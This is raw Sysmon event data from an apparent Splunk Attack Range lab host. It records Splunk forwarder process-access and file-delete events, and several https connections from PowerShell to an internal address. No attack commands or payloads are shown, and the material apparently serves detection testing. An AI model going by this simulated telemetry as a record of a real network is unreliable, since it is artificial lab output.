15:08:18.013{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:18.013{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:18.013{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:18.013{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:18.013{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-74E1-613B-75B4-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:18.013{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74E1-613B-75B4-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.998{B81B27B7-74E1-613B-75B4-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:19.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDB233B8132DBF0CE5C2C7A97A0E1FE2,SHA256=9F52059EB668DE5FC0CFDFAC9A94175122C1999D7DC9F3508DD18B81A09FF40E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:20.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2C34E00168FD9B4CD86A965FA548B8,SHA256=EADBA9721B639958B5E054A46FC15884799FB7491342457D338C63202385E1B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:21.966{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=628B599739C92995852024500D07271F,SHA256=D7EBC5CE80C3A7E0A58BDD48152A28455A8C342D2C0F1180E58195B854C9D902,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:21.747{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F427FBECF426FDD93927025127316016,SHA256=DD30140971BC0041627C5C59604056DC7139F2DE09DDD11A4352B1DA008781C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:22.980{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC97F1398B25A84FF17FAB9E49872A86,SHA256=16C137786B54165A683BE48B257B648E8E5B3FBA22B4E58432401BC0940F739C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:47.690{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52636-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:23.995{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71FCFFA1EE6A7E7CFDBD031D85661DB0,SHA256=C0598402B016AB43293331E3A5D872518749B455C3B262923D91A8765588191B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:49.089{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52637-false10.0.1.12-8000- 23542300x800000000000000035344109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:23.264{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:25.798{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FC241E27D138756EB4EFEE0E40B39F80,SHA256=947B1E3CE947902FB3A7FE062484BDE19242A6A5099F560D5243862F188F29CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:50.250{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52638-false10.0.1.12-8089- 23542300x800000000000000035344112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:25.010{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF3DFA7EAA7D8242E17093999241371B,SHA256=27A92468FD1096600E90BF0A09E5A31D9DF0D1FDA0439F75A114CC9FEE51042F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:51.703{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52639-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:26.029{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DB645DBC879910F026EA07E57D8AEB,SHA256=70A19245A9C9AC6D27332AE5C756064EE9483DF7F6EAA2FB7D4E9ED7D68E3565,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:27.046{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B1F120F049B196D3128366B651A17C6,SHA256=3A40AB001FA153493371948CEAFA15EF37FD0358A8EB69CFE7754F100A2A8C20,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:54.104{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52640-false10.0.1.12-8000- 23542300x800000000000000035344118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:28.096{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06E3C76DE8FA77D862E61BC71D6CBD78,SHA256=3CA7FA0589AE158F1890CE6EDEB4B9D95F7CCE253AEE5BB61B2B8D3F07DA451C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:29.145{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A0FF41B36BE6FC84D87E43719A223D3,SHA256=514FF8D19722754690410E81A240B339B76CF78F894FBA3783BF3C7BED225CBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:30.147{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0F18F8E503DA61E6BC7D05223EB3D3C,SHA256=08BE700D5DB793BD59B1471E41795AC77857682514F1364BDB92AC00B7F25C82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.900{B81B27B7-74EF-613B-77B4-03000000C801}15846496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035344141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.716{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B22D0F2B5EE4B43E61672D8AAA97163E,SHA256=B499CA585821FA4DC7DC9AF876DBBF8E4115133B618646EE717FC6E232DF91FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.684{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74EF-613B-77B4-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.684{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.684{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.684{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.684{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-74EF-613B-77B4-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.684{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.684{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74EF-613B-77B4-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.670{B81B27B7-74EF-613B-77B4-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035344132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.338{B81B27B7-74EF-613B-76B4-03000000C801}29005344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035344131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E760FA044E14B0DF293065091783D65,SHA256=BFA1A667044A2F0229383F60D9388E5C12295E312E44759CD9FDC3D27A4F1159,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.154{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74EF-613B-76B4-03000000C801}2900C:\Program 